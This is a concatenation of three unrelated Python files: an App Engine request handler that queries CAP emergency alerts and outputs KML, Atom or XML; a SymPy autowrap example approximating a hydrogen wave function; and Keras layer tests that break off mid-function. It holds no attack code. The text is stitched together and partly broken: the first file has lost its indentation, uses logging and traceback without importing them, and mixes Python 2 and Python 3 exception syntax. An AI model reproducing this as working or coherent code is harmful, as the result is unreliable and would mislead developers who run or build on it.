from xml.parsers import expat
# Third party imports.
import pyfo
import cap as caplib
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.runtime import DeadlineExceededError
import cap2kml
import cap_parse_mem
import cap_schema
import cap_schema_mem
import web_query
import webapp_util
import xml_util
CAP_V1_1_XMLNS_URN = 'urn:oasis:names:tc:emergency:cap:1.1'
def _MakeCapSchema():
# TODO(Matt Frantz): Permit different set of operators for timestamps, geo.
scalar_ops = web_query.Operators.SCALAR_ALL
datetime_ops = web_query.Operators.DATETIME_ALL
key_ops = web_query.Operators.KEY_ALL
list_ops = web_query.Operators.LIST_ALL
default_model = 'CapAlert'
return web_query.Schema({
'Feed': {
'url': scalar_ops},
default_model: {
'crawl': key_ops,
'feed': key_ops,
'url': scalar_ops,
'identifier': scalar_ops,
'sender': scalar_ops,
'sent': datetime_ops,
'status': scalar_ops,
'msgType': scalar_ops,
'source': scalar_ops,
'scope': scalar_ops,
'restriction': scalar_ops,
'code': list_ops,
'references': list_ops,
# Info
'language': list_ops,
'category': list_ops,
'responseType': list_ops,
'urgency': list_ops,
'severity': list_ops,
'certainty': list_ops,
'audience': list_ops,
'effective': datetime_ops,
'onset': datetime_ops,
'expires': datetime_ops,
'senderName': list_ops,
'web': list_ops,
'contact': list_ops,
# Resource
'resourceDesc': list_ops,
'mimeType': list_ops,
'size': list_ops,
'uri': list_ops,
# Area
'altitude': list_ops,
'ceiling': list_ops,
},
}, default_model)
CAP_SCHEMA = _MakeCapSchema()
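# Query predicates arrive as CGI arguments named '<Model>.<field>' (e.g.
# 'Feed.url', as used in the error path of CapQuery._QueryByFeed below); the
# operator sets above limit which comparisons web_query accepts per field.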
class CapQueryResult(object):
"""Contains a single element of a CapQuery result.
Attributes:
model: cap_schema_mem.ShadowAlert object
text: Original XML text (str or unicode)
url: URL from which the text was fetched (str or unicode)
"""
def __init__(self, model, text, url):
self.model = model
self.text = text
self.url = url
class CapQuery(webapp.RequestHandler):
"""Handler for requests that require queries of Datastore.
This class includes the query execution planning logic.
Queries involve either a direct query on the main CAP model (CapAlert), or
an indirect query via references from Feed. The _WriteResponse virtual
method will be provided with an iterable of instances of CAP Alert model
types.
"""
def get(self):
"""Parses query predicates and responds with error screens or CAP data."""
user_query, unknown_arguments = CAP_SCHEMA.QueryFromRequest(self.request)
unknown_arguments = self._HandleUnknownArguments(
frozenset(unknown_arguments))
if unknown_arguments:
webapp_util.WriteTemplate(self.response, 'unknown_arguments.html',
{'unknown_arguments': unknown_arguments,
'models': CAP_SCHEMA.Help()})
return
# Choose the query executor.
# TODO(Matt Frantz): Better query execution planning.
if 'Feed' in user_query.models:
execute = self._QueryByFeed
elif 'CapAlert' in user_query.models:
execute = self._QueryByCapAlert
else:
webapp_util.WriteTemplate(self.response, 'no_arguments.html',
dict(models=CAP_SCHEMA.Help()))
return
# Use the most recent completed crawl for each feed to serve queries.
restricted_query = self._ApplyLastCrawlsToQuery(user_query)
# Execute the query.
alerts = execute(user_query, restricted_query)
# If an error response is written, no CAP data will be returned.
if alerts is not None:
self._WriteResponse(alerts, user_query)
def _HandleUnknownArguments(self, unknown_arguments):
"""Filters arguments that are not web_query parameters.
Args:
unknown_arguments: Set (possibly empty) of CGI argument names (frozenset
of str or unicode).
Returns:
Set of truly unknown arguments for generating an error screen (frozenset
of str or unicode).
"""
raise NotImplementedError()
def _WriteResponse(self, alerts, user_query):
"""Abstract method that writes the response of a slow path query.
Args:
alerts: Iterable of CapQueryResult objects.
user_query: What the user specified (web_query.Query)
Postconditions:
self.response is populated.
"""
raise NotImplementedError()
def _ApplyLastCrawlsToQuery(self, user_query):
"""Restrict the user query to the latest crawl.
Args:
user_query: web_query.Query object
Returns:
web_query.Query object with crawl predicates
"""
crawls = cap_schema.LastCrawls()
if not crawls:
return user_query
# Extend the list of predicates with Crawl predicates.
predicates = list(user_query.predicates)
predicates.append(
web_query.SimpleComparisonPredicate('CapAlert', 'crawl', list(crawls),
web_query.Operators.KEY_IN))
return web_query.Query(predicates)
def _QueryByFeed(self, user_query, restricted_query):
"""Queries by following the Feed -> Cap hierarchy.
Args:
user_query: What the user specified (web_query.Query)
restricted_query: Last crawled version of user_query (web_query.Query)
Returns:
Iterable of CapQueryResult objects.
"""
# Lookup the feeds.
gql_list, gql_params = restricted_query.ApplyToGql('Feed')
feed_query = db.GqlQuery(
'SELECT __key__ FROM Feed WHERE %s' % ' AND '.join(gql_list),
**gql_params)
feed_keys = list(feed_query)
if not feed_keys:
# Show all valid feed URL's in the error page.
all_feed_query = cap_schema.Feed.all()
webapp_util.WriteTemplate(
self.response, 'unknown_feed_url.html',
{'unknown_feed_url': repr(self.request.get('Feed.url')),
'feed_urls': [repr(x.url) for x in all_feed_query]})
return None
# Extend the list of predicates with Feed.key predicates.
predicates = list(restricted_query.predicates) + [
web_query.SimpleComparisonPredicate('CapAlert', 'feed', feed_keys,
web_query.Operators.KEY_IN)]
cap_query = web_query.Query(predicates)
return self._DoCapAlertQuery(user_query, cap_query)
def _QueryByCapAlert(self, user_query, restricted_query):
"""Queries the CapAlert models directly.
Args:
user_query: What the user specified (web_query.Query)
restricted_query: Last crawled version of user_query (web_query.Query)
Returns:
Iterable of CapQueryResult objects.
"""
assert 'Feed' not in user_query.models
return self._DoCapAlertQuery(user_query, restricted_query)
def _DoCapAlertQuery(self, user_query, restricted_query):
"""Executes a CapAlert query and returns the CAP representations.
Args:
user_query: What the user specified (web_query.Query)
restricted_query: Last crawled version of user_query (web_query.Query)
Returns:
Iterable of CapQueryResult objects.
"""
return self._DoQuery('CapAlert', cap_schema.CapAlert,
user_query, restricted_query)
def _DoQuery(self, model_name, model_class, user_query, restricted_query):
"""Runs the Datastore query.
Args:
model_name: Model name (str)
model_class: db.Model subclass
user_query: What the user specified (web_query.Query)
restricted_query: Last crawled version of user_query (web_query.Query)
Returns:
Iterable of CapQueryResult objects.
"""
gql_list, gql_params = restricted_query.ApplyToGql(model_name)
db_query = model_class.gql('WHERE %s' % ' AND '.join(gql_list),
**gql_params)
model_count = 0
# Avoid duplicate alerts.
alert_texts = set()
# We may need the cap_parse parser.
parser = cap_parse_mem.MemoryCapParser(query=user_query)
# Count how many alerts were handled in different execution paths.
caplib_alerts = 0
parseable_alerts = 0
clean_alerts = 0
unparseable_alerts = 0
unicode_alerts = 0
bad_xml_alerts = 0
# Transform ShadowCap list into a list of CapQueryResult objects.
alerts = []
for model in db_query:
model_count += 1
# Suppress duplicates.
alert_text = model.text
if alert_text in alert_texts:
continue
else:
alert_texts.add(alert_text)
# We will eventually have to get a Cap, ShadowCap, or proxy object.
# We'll get it in the most efficient way possible.
# Try it with the standard-conforming parser.
alert_model = CapQuery._ParseConformingCap(alert_text, query=user_query)
if alert_model:
caplib_alerts += 1
else:
# If we were unable to use the caplib parser, try our own.
alert_model, errors = CapQuery._ParseNonconformingCap(parser, alert_text)
if alert_model:
if errors:
parseable_alerts += 1
else:
clean_alerts += 1
else:
unparseable_alerts += 1
# Filter any predicates that might not have been applied in the GQL query.
if alert_model and user_query.PermitsModel('Cap', alert_model):
# Save the model and the original XML.
alerts.append(
CapQueryResult(alert_model, alert_text, model.url))
unique_model_count = len(alerts)
logging.info(
('Visited %(model_count)d models, %(unique_model_count)d unique = ' +
'%(caplib_alerts)d caplib + %(clean_alerts)d clean + ' +
'%(parseable_alerts)d parseable + %(unparseable_alerts)d unparseable'),
locals())
return alerts
@classmethod
def _ParseConformingCap(cls, alert_text, query=None):
"""Parses CAP alert with the standard-conforming caplib parser.
Args:
alert_text: XML representation of the alert (unicode)
query: web_query.Query object for deferred filtering.
Returns:
cap_schema_mem.ShadowCap object or None if there was a problem parsing.
"""
cap_namespaces = [CAP_V1_1_XMLNS_URN]
try:
# Convert to string, since expat parser does not seem to support
# Unicode.
# TODO(Matt Frantz): Figure out why we have to do this. Expat claims
# to support Unicode. Maybe we can use a different parser for
# caplib.
alert_text_str = str(alert_text)
for cap_namespace in cap_namespaces:
try:
# Parse the XML into a caplib.Alert object.
alert_model = caplib.ParseString(alert_text_str,
namespace=cap_namespace)
# Create a shadow alert object that can apply the deferred query.
shadow_alert = cap_schema_mem.ShadowAlert(query=query)
# Copy the data from the original alert to the shadow using an
# internal method (defined in caplib's Container class). The
# Container constructor is overly restrictive about the type of the
# template argument, so this hack is necessary.
# TODO(Matt Frantz): Avoid this hack.
shadow_alert._init_from_obj_(alert_model)
break
except (caplib.ConformanceError, ValueError, TypeError), e:
logging.debug('caplib error %s (%s) parsing %r',
type(e), e, alert_text_str)
except UnicodeEncodeError, e:
# We can't convert to string, so we can't really parse this with the
# caplib parser.
logging.debug('UnicodeEncodeError (%s) parsing %r', e, alert_text)
except expat.ExpatError, e:
# XML parsing errors are namespace-independent (right?), so log it
# and stop trying.
logging.debug('ExpatError (%s) parsing %r', e, alert_text)
return None
@classmethod
def _ParseNonconformingCap(cls, parser, alert_text, query=None):
"""Parses CAP alert with our own permissive parser.
Args:
parser: cap_parse_mem.MemoryCapParser object
alert_text: XML representation of the alert (unicode)
query: web_query.Query object for deferred filtering.
Returns:
(alert_model, errors)
alert_model: cap_schema_mem.ShadowCap object, or None if there was an
unrecoverable error.
errors: List of recoverable errors, if any.
"""
try:
new_alert_model = lambda: cap_schema_mem.ShadowAlert(query=query)
return parser.MakeAlert(new_alert_model, alert_text)
except cap_parse_mem.Error, e:
logging.debug('%s', traceback.format_exc())
logging.debug('cap_parse_mem error %s (%s) parsing %r',
type(e), e, alert_text)
return None, []
@classmethod
def _NormalizeAlertText(cls, alert_text):
"""Normalizes the XML text representation of a CAP alert node.
Strips any tag namespace prefixes.
Args:
alert_text: XML representation (str or unicode)
Returns:
Normalized XML representation (unicode)
"""
alert_nodes = cap_parse_mem.ParseCapAlertNodes(alert_text)
if len(alert_nodes) > 1:
logging.error(
'How did that get in there? I thought cap_mirror rejected CAPs' +
' with more than one alert node!\n%r', alert_text)
alert_node = alert_nodes[0]
cls._NormalizeAlert(alert_node, CAP_V1_1_XMLNS_URN)
return xml_util.NodeToString(alert_node)
@classmethod
def _NormalizeAlert(cls, node, namespace_urn):
"""Normalizes the XML representation of a CAP alert node.
Strips any tag namespace prefixes.
Args:
node: xml.dom.Node representing the CAP alert (modified in place)
namespace_urn: XML namespace URN (str)
"""
# Apply the namespace prefix throughout.
cls._NormalizeNode(node)
# Strip out any xmlns attributes.
attributes = node.attributes
for i in xrange(attributes.length):
attribute = attributes.item(i)
name = attribute.name
if name == 'xmlns' or name.startswith('xmlns:'):
node.removeAttribute(name)
# Apply the XML namespace attribute to the alert node.
node.setAttribute('xmlns', namespace_urn)
@classmethod
def _NormalizeNode(cls, node):
"""Normalizes the XML representation of an XML node.
Strips any tag namespace prefix.
Args:
node: xml.dom.Node (modified in place).
"""
try:
tag = node.tagName
except AttributeError:
# Not an XML element.
return
node.tagName = cls._NormalizeTag(tag)
for child in node.childNodes:
cls._NormalizeNode(child)
@classmethod
def _NormalizeTag(cls, tag):
"""Normalizes the XML tag name.
Strips any tag namespace prefix.
Args:
tag: XML node tag (str)
Returns:
tag without any namespace prefix.
"""
colon = tag.find(':')
if colon >= 0:
tag = tag[colon + 1:]
return tag
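# Example: CapQuery._NormalizeTag('cap:alert') returns 'alert'; a tag with no
# namespace prefix is returned unchanged.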
class Cap2Kml(CapQuery):
"""Handler for cap2kml requests that produce KML responses.
Attributes:
as_xml: If True, response content type will be XML. If False, it will be
KML. (Written by _HandleUnknownArguments; read by _WriteResponse.)
"""
def _HandleUnknownArguments(self, unknown_arguments):
"""Filters arguments that are not web_query parameters.
Args:
unknown_arguments: Set (possibly empty) of CGI argument names (frozenset
of str or unicode).
Returns:
Set of truly unknown arguments for generating an error screen (frozenset
of str or unicode).
"""
unknown_arguments = set(unknown_arguments)
# Support alternate response content type.
self.as_xml = 'as_xml' in unknown_arguments and self.request.get('as_xml')
unknown_arguments.discard('as_xml')
return frozenset(unknown_arguments)
def _WriteResponse(self, alerts, user_query):
"""Writes a KML response.
Args:
alerts: Iterable of CapQueryResult objects.
user_query: What the user specified (web_query.Query)
Postconditions:
self.response is populated.
"""
logging.info('Generating KML')
placemarks = []
for alert in alerts:
try:
placemark = cap2kml.CapAlertAsKmlPlacemark(alert.model).ToKml()
placemarks.append(placemark)
except (DeadlineExceededError, AssertionError):
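        # Let deadline overruns and assertion failures propagate; only
        # per-alert conversion errors are skipped.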
raise
      except Exception as e:
logging.exception(e)
if self.as_xml:
content_type = 'text/xml'
else:
content_type = 'application/vnd.google-earth.kml+xml'
logging.info('Writing response as %s', content_type)
self.response.headers['Content-Type'] = content_type
self.response.out.write(pyfo.pyfo(cap2kml.Kml(placemarks), prolog=True))
class Cap2Atom(CapQuery):
"""Handler for cap2atom requests that produce ATOM responses."""
def _HandleUnknownArguments(self, unknown_arguments):
"""Filters arguments that are not web_query parameters.
Args:
unknown_arguments: Set (possibly empty) of CGI argument names (frozenset
of str or unicode).
Returns:
Set of truly unknown arguments for generating an error screen (frozenset
of str or unicode).
"""
# We don't have any additional arguments.
return unknown_arguments
def _WriteResponse(self, alerts, user_query):
"""Writes an ATOM index of CAP's.
Args:
alerts: Iterable of CapQueryResult objects.
user_query: What the user specified (web_query.Query)
Postconditions:
self.response is populated.
"""
# Generate a feed title based on the query.
title = 'CapQuery: %s' % user_query
# Normalize the XML.
logging.info('Normalizing XML')
# TODO(Matt Frantz): Some deferred predicates will be ignored because we are
# returning to the source XML rather than allowing the shadow models to
# apply the predicates. When cap_parse is a complete parser, we can use
# the model to generate the filtered, normalized XML.
# TODO(Matt Frantz): We could normalize XML during crawl, although that
# would make it difficult to apply improvements to the parser
# retroactively on historical data.
for alert in alerts:
alert.text = Cap2Atom._NormalizeAlertText(alert.text)
logging.info('Writing response')
webapp_util.WriteTemplate(self.response, 'atom_index.xml',
dict(title=title, alerts=alerts))
self.response.headers['Content-Type'] = 'text/xml'
class Cap2Dump(CapQuery):
"""Handler for cap2dump requests that produce debug XML responses."""
def _HandleUnknownArguments(self, unknown_arguments):
"""Filters arguments that are not web_query parameters.
Args:
unknown_arguments: Set (possibly empty) of CGI argument names (frozenset
of str or unicode).
Returns:
Set of truly unknown arguments for generating an error screen (frozenset
of str or unicode).
"""
# We don't have any additional arguments.
return unknown_arguments
def _WriteResponse(self, alerts, user_query):
"""Writes escaped XML rendering of CAP's.
Args:
alerts: Iterable of CapQueryResult objects.
user_query: What the user specified (web_query.Query)
Postconditions:
self.response is populated.
"""
# Generate a feed title based on the query.
title = 'CapQuery: %s' % user_query
logging.info('Writing response')
self.response.headers['Content-Type'] = 'text/xml'
webapp_util.WriteTemplate(self.response, 'cap_dump.xml',
dict(title=title, alerts=alerts))
application = webapp.WSGIApplication(
[('/cap2kml', Cap2Kml),
('/cap2atom', Cap2Atom),
('/cap2dump', Cap2Dump),
],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
"""
Numerical integration with autowrap
-----------------------------------
This example demonstrates how you can use the autowrap module in SymPy
to create fast numerical integration routines callable from Python. See
the code for detailed explanations of the various steps. An
autowrapped sympy expression can be significantly faster than what you
would get by applying a sequence of the ufuncs shipped with numpy. [0]
We will find the coefficients needed to approximate a quantum mechanical
Hydrogen wave function in terms of harmonic oscillator solutions. For
the sake of demonstration, this will be done by setting up a simple
numerical integration scheme as a SymPy expression, and obtaining a binary
implementation with autowrap.
You need to have numpy installed to run this example, as well as a
working fortran compiler. If you have pylab installed, you will be
rewarded with a nice plot in the end.
[0]:
http://ojensen.wordpress.com/2010/08/10/fast-ufunc-ish-hydrogen-solutions/
----
"""
import sys
from sympy.external import import_module
np = import_module('numpy')
if not np:
sys.exit("Cannot import numpy. Exiting.")
pylab = import_module('pylab', warn_not_installed=True)
from sympy.utilities.lambdify import implemented_function
from sympy.utilities.autowrap import autowrap, ufuncify
from sympy import Idx, IndexedBase, Lambda, pprint, Symbol, oo, Integral,\
Function
from sympy.physics.sho import R_nl
from sympy.physics.hydrogen import R_nl as hydro_nl
# ***************************************************************************
# calculation parameters to play with
# ***************************************************************************
basis_dimension = 5 # Size of h.o. basis (n < basis_dimension)
omega2 = 0.1 # in atomic units: twice the oscillator frequency
orbital_momentum_l = 1 # the quantum number `l` for angular momentum
hydrogen_n = 2 # the nodal quantum number for the Hydrogen wave
rmax = 20 # cut off in the radial direction
gridsize = 200 # number of points in the grid
# ***************************************************************************
def main():
print(__doc__)
# arrays are represented with IndexedBase, indices with Idx
m = Symbol('m', integer=True)
i = Idx('i', m)
A = IndexedBase('A')
B = IndexedBase('B')
x = Symbol('x')
print("Compiling ufuncs for radial harmonic oscillator solutions")
# setup a basis of ho-solutions (for l=0)
basis_ho = {}
for n in range(basis_dimension):
# Setup the radial ho solution for this n
expr = R_nl(n, orbital_momentum_l, omega2, x)
        # Reduce the number of operations in the expression by evaluating
        # constants to floating point
expr = expr.evalf(15)
print("The h.o. wave function with l = %i and n = %i is" % (
orbital_momentum_l, n))
pprint(expr)
# implement, compile and wrap it as a ufunc
basis_ho[n] = ufuncify(x, expr)
# now let's see if we can express a hydrogen radial wave in terms of
# the ho basis. Here's the solution we will approximate:
H_ufunc = ufuncify(x, hydro_nl(hydrogen_n, orbital_momentum_l, 1, x))
# The transformation to a different basis can be written like this,
#
# psi(r) = sum_i c(i) phi_i(r)
#
# where psi(r) is the hydrogen solution, phi_i(r) are the H.O. solutions
# and c(i) are scalar coefficients.
#
# So in order to express a hydrogen solution in terms of the H.O. basis, we
# need to determine the coefficients c(i). In position space, it means
# that we need to evaluate an integral:
#
    #   psi(r) = sum_i Integral(R**2*conj(phi_i(R))*psi(R), (R, 0, oo)) phi_i(r)
#
# To calculate the integral with autowrap, we notice that it contains an
# element-wise sum over all vectors. Using the Indexed class, it is
# possible to generate autowrapped functions that perform summations in
# the low-level code. (In fact, summations are very easy to create, and as
# we will see it is often necessary to take extra steps in order to avoid
# them.)
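    # An illustrative aside (hypothetical helper, not used by this example):
    # the overlap integral below is just a rectangular rule, which in plain
    # numpy reads as follows. The autowrapped routine built next is the
    # compiled analogue of this one-liner.
    def _np_overlap(r, phi_vals, psi_vals, step):
        # approximate Integral(r**2 * phi(r) * psi(r), (r, 0, rmax))
        return float(np.sum(r**2 * phi_vals * psi_vals) * step)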
# we need one integration ufunc for each wave function in the h.o. basis
binary_integrator = {}
for n in range(basis_dimension):
#
# setup basis wave functions
#
# To get inline expressions in the low level code, we attach the
# wave function expressions to a regular SymPy function using the
# implemented_function utility. This is an extra step needed to avoid
# erroneous summations in the wave function expressions.
#
# Such function objects carry around the expression they represent,
# but the expression is not exposed unless explicit measures are taken.
# The benefit is that the routines that searches for repeated indices
# in order to make contractions will not search through the wave
# function expression.
psi_ho = implemented_function('psi_ho',
Lambda(x, R_nl(n, orbital_momentum_l, omega2, x)))
# We represent the hydrogen function by an array which will be an input
# argument to the binary routine. This will let the integrators find
# h.o. basis coefficients for any wave function we throw at them.
psi = IndexedBase('psi')
#
# setup expression for the integration
#
step = Symbol('step') # use symbolic stepsize for flexibility
# let i represent an index of the grid array, and let A represent the
# grid array. Then we can approximate the integral by a sum over the
# following expression (simplified rectangular rule, ignoring end point
# corrections):
expr = A[i]**2*psi_ho(A[i])*psi[i]*step
if n == 0:
print("Setting up binary integrators for the integral:")
pprint(Integral(x**2*psi_ho(x)*Function('psi')(x), (x, 0, oo)))
# Autowrap it. For functions that take more than one argument, it is
# a good idea to use the 'args' keyword so that you know the signature
# of the wrapped function. (The dimension m will be an optional
# argument, but it must be present in the args list.)
binary_integrator[n] = autowrap(expr, args=[A.label, psi.label, step, m])
        # Let's see how it converges with the grid dimension
print("Checking convergence of integrator for n = %i" % n)
for g in range(3, 8):
grid, step = np.linspace(0, rmax, 2**g, retstep=True)
print("grid dimension %5i, integral = %e" % (2**g,
binary_integrator[n](grid, H_ufunc(grid), step)))
print("A binary integrator has been set up for each basis state")
print("We will now use them to reconstruct a hydrogen solution.")
# Note: We didn't need to specify grid or use gridsize before now
grid, stepsize = np.linspace(0, rmax, gridsize, retstep=True)
print("Calculating coefficients with gridsize = %i and stepsize %f" % (
len(grid), stepsize))
coeffs = {}
for n in range(basis_dimension):
coeffs[n] = binary_integrator[n](grid, H_ufunc(grid), stepsize)
print("c(%i) = %e" % (n, coeffs[n]))
print("Constructing the approximate hydrogen wave")
hydro_approx = 0
all_steps = {}
for n in range(basis_dimension):
hydro_approx += basis_ho[n](grid)*coeffs[n]
all_steps[n] = hydro_approx.copy()
if pylab:
line = pylab.plot(grid, all_steps[n], ':', label='max n = %i' % n)
# check error numerically
diff = np.max(np.abs(hydro_approx - H_ufunc(grid)))
print("Error estimate: the element with largest deviation misses by %f" % diff)
if diff > 0.01:
print("This is much, try to increase the basis size or adjust omega")
else:
print("Ah, that's a pretty good approximation!")
# Check visually
if pylab:
print("Here's a plot showing the contribution for each n")
line[0].set_linestyle('-')
pylab.plot(grid, H_ufunc(grid), 'r-', label='exact')
pylab.legend()
pylab.show()
print("""Note:
These binary integrators were specialized to find coefficients for a
harmonic oscillator basis, but they can process any wave function as long
as it is available as a vector and defined on a grid with equidistant
points. That is, on any grid you get from numpy.linspace.
To make the integrators even more flexible, you can set up the harmonic
oscillator solutions with symbolic parameters omega and l. Then the
autowrapped binary routine will take these scalar variables as arguments,
so that the integrators can find coefficients for *any* isotropic harmonic
oscillator basis.
""")
if __name__ == '__main__':
main()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras core layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import textwrap
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.mixed_precision import policy
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.platform import test
@keras_parameterized.run_all_keras_modes
class DropoutLayersTest(keras_parameterized.TestCase):
def test_dropout(self):
testing_utils.layer_test(
keras.layers.Dropout, kwargs={'rate': 0.5}, input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Dropout,
kwargs={'rate': 0.5,
'noise_shape': [3, 1]},
input_shape=(3, 2))
def test_dropout_supports_masking(self):
dropout = keras.layers.Dropout(0.5)
self.assertEqual(True, dropout.supports_masking)
def test_spatial_dropout_1d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout1D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4))
def test_spatial_dropout_2d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout2D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4, 5))
testing_utils.layer_test(
keras.layers.SpatialDropout2D,
kwargs={'rate': 0.5, 'data_format': 'channels_first'},
input_shape=(2, 3, 4, 5))
def test_spatial_dropout_3d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout3D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4, 4, 5))
testing_utils.layer_test(
keras.layers.SpatialDropout3D,
kwargs={'rate': 0.5, 'data_format': 'channels_first'},
input_shape=(2, 3, 4, 4, 5))
def test_dropout_partial_noise_shape(self):
inputs = keras.Input(shape=(5, 10))
layer = keras.layers.Dropout(0.5, noise_shape=(None, 1, None))
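    # noise_shape=(None, 1, None) broadcasts a single dropout mask across
    # axis 1, so every step along that axis is dropped identically.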
outputs = layer(inputs)
model = keras.Model(inputs, outputs)
out = model(np.ones((20, 5, 10)), training=True)
out_np = keras.backend.get_value(out)
# Test that dropout mask is shared across second dim.
self.assertAllClose(out_np[:, 0, :], out_np[:, 1, :])
@keras_parameterized.run_all_keras_modes
class LambdaLayerTest(keras_parameterized.TestCase):
def test_lambda(self):
testing_utils.layer_test(
keras.layers.Lambda,
kwargs={'function': lambda x: x + 1},
input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Lambda,
kwargs={
'function': lambda x, a, b: x * a + b,
'arguments': {
'a': 0.6,
'b': 0.4
}
},
input_shape=(3, 2))
# test serialization with function
def f(x):
return x + 1
ld = keras.layers.Lambda(f)
config = ld.get_config()
ld = keras.layers.deserialize({
'class_name': 'Lambda',
'config': config
})
self.assertEqual(ld.function(3), 4)
# test with lambda
ld = keras.layers.Lambda(
lambda x: keras.backend.concatenate([math_ops.square(x), x]))
config = ld.get_config()
ld = keras.layers.Lambda.from_config(config)
self.assertAllEqual(self.evaluate(ld.function([3])), [9, 3])
def test_lambda_multiple_inputs(self):
ld = keras.layers.Lambda(lambda x: x[0], output_shape=lambda x: x[0])
x1 = np.ones([3, 2], np.float32)
x2 = np.ones([3, 5], np.float32)
out = ld([x1, x2])
self.assertAllEqual(out.shape, [3, 2])
def test_lambda_output_shape(self):
l = keras.layers.Lambda(lambda x: x + 1, output_shape=(1, 1))
l(keras.backend.variable(np.ones((1, 1))))
self.assertEqual((1, 1), l.get_config()['output_shape'])
def test_lambda_output_shape_function(self):
def get_output_shape(input_shape):
return 1 * input_shape
l = keras.layers.Lambda(lambda x: x + 1, output_shape=get_output_shape)
l(keras.backend.variable(np.ones((1, 1))))
self.assertEqual('lambda', l.get_config()['output_shape_type'])
def test_lambda_output_shape_autocalculate_multiple_inputs(self):
def lambda_fn(x):
return math_ops.matmul(x[0], x[1])
l = keras.layers.Lambda(lambda_fn, dtype=dtypes.float64)
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual((10, 20), output_shape)
output_signature = l.compute_output_signature([
tensor_spec.TensorSpec(dtype=dtypes.float64, shape=(10, 10)),
tensor_spec.TensorSpec(dtype=dtypes.float64, shape=(10, 20))])
self.assertAllEqual((10, 20), output_signature.shape)
self.assertAllEqual(dtypes.float64, output_signature.dtype)
def test_lambda_output_shape_list_multiple_outputs(self):
def lambda_fn(x):
return x
l = keras.layers.Lambda(lambda_fn, output_shape=[(10,), (20,)])
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual([(10, 10), (10, 20)], output_shape)
def test_lambda_output_shape_tuple_with_none(self):
def lambda_fn(x):
return x
l = keras.layers.Lambda(lambda_fn, output_shape=(None, 10))
output_shape = l.compute_output_shape((5, 10, 20))
self.assertAllEqual([5, None, 10], output_shape.as_list())
def test_lambda_output_shape_function_multiple_outputs(self):
def lambda_fn(x):
return x
def output_shape_fn(input_shape):
return input_shape
l = keras.layers.Lambda(lambda_fn, output_shape=output_shape_fn)
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual([(10, 10), (10, 20)], output_shape)
def test_lambda_output_shape_nested(self):
def lambda_fn(inputs):
return (inputs[1]['a'], {'b': inputs[0]})
l = keras.layers.Lambda(lambda_fn)
output_shape = l.compute_output_shape(((10, 20), {'a': (10, 5)}))
self.assertAllEqual(((10, 5), {'b': (10, 20)}), output_shape)
def test_lambda_config_serialization(self):
# Test serialization with output_shape and output_shape_type
layer = keras.layers.Lambda(
lambda x: x + 1,
output_shape=(1, 1),
mask=lambda i, m: m)
layer(keras.backend.variable(np.ones((1, 1))))
config = layer.get_config()
layer = keras.layers.deserialize({
'class_name': 'Lambda',
'config': config
})
self.assertAllEqual(layer.function(1), 2)
self.assertAllEqual(layer._output_shape, (1, 1))
self.assertAllEqual(layer.mask(1, True), True)
layer = keras.layers.Lambda.from_config(config)
self.assertAllEqual(layer.function(1), 2)
self.assertAllEqual(layer._output_shape, (1, 1))
self.assertAllEqual(layer.mask(1, True), True)
def test_lambda_with_training_arg(self):
def fn(x, training=True):
return keras.backend.in_train_phase(x, 2 * x, training=training)
layer = keras.layers.Lambda(fn)
x = keras.backend.ones(())
train_out = layer(x, training=True)
eval_out = layer(x, training=False)
self.assertEqual(keras.backend.get_value(train_out), 1.)
self.assertEqual(keras.backend.get_value(eval_out), 2.)
def test_lambda_with_mask(self):
def add_one(inputs):
return inputs + 1.0
def mask(unused_inputs, previous_mask):
return previous_mask
layer = keras.layers.Lambda(add_one, mask=mask)
x = np.ones([5, 4, 3])
x[:, -1, :] = 0
masking = keras.layers.Masking()
out = layer(masking(x))
expected_out = np.full([5, 4, 3], 2.0)
expected_out[:, -1, :] = 1.0
expected_mask = np.ones([5, 4])
expected_mask[:, -1] = 0.0
self.assertAllClose(self.evaluate(out), expected_out)
self.assertIsNotNone(out._keras_mask)
self.assertAllClose(self.evaluate(out._keras_mask), expected_mask)
def test_lambda_with_ragged_input(self):
def add_one(inputs):
return inputs + 1.0
layer = keras.layers.Lambda(add_one)
ragged_input = ragged_factory_ops.constant([[1.0], [2.0, 3.0]])
out = layer(ragged_input)
expected_out = ragged_factory_ops.constant([[2.0], [3.0, 4.0]])
self.assertAllClose(out, expected_out)
def test_lambda_deserialization_does_not_pollute_core(self):
layer = keras.layers.Lambda(lambda x: x + 1)
config = layer.get_config()
keras.layers.Lambda.from_config(config)
self.assertNotIn(self.__class__.__name__, dir(core))
class TestStatefulLambda(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_lambda_with_variable_in_model(self):
v = variables.Variable(1., trainable=True)
def lambda_fn(x, v):
return x * v
